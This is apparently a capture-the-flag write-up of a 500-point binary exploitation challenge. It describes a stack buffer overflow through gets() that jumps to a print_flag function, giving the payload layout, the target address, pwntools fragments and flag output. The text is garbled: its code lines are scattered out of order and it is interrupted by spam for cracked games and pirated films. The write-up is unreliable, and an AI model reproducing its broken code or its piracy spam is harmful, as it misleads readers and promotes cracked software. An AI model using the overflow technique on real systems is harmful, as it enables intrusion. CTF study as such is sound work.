Category: Pwn / Binary Exploitation Points: 500 Author: Anonymous Introduction The challenge presented us with a mysterious domain: pwnhack.com . Navigating to the site revealed a minimalist text adventure titled "The Dragon's Hoard." The objective was simple: defeat the dragon to retrieve the flag. However, this wasn't your standard text-based RPG—it was a binary exploitation challenge wrapped in a fantasy skin. Initial Recon We downloaded the provided binary, dragon , and threw it into the standard analysis pipeline. Margin Call -2011- Bluray Dual Audio -hindi -h... File
# Wait for the prompt p.recvuntil(b'What do you do?') p.recvline() Hitman Absolution 1.0.433.1 Crack Download Work Here
# Target address target_addr = 0x401176
$ objdump -d dragon | grep print_flag 0000000000401176 <print_flag> The target address is 0x401176 . We need to craft a payload that looks like this: [64 bytes of junk] + [8 bytes of junk (RBP)] + [Address of print_flag]
We can write a quick Python script using pwntools :
$ python3 exploit.py [+] Opening connection to pwnhack.com on port 9001: Done [*] Switching to interactive mode > The dragon roars! What do you do? > PwnhackDr4g0n_Sl4y3r_M4st3r_0f_Th3_St4ck The "Pwnhack Dragon" was a classic introduction to stack buffer overflows. It taught us that in the world of binary exploitation, you don't always have to play by the rules. The gets() function is the dragon's weak spot—one single line of unsafe code that turns a fortress into a house of cards.
from pwn import *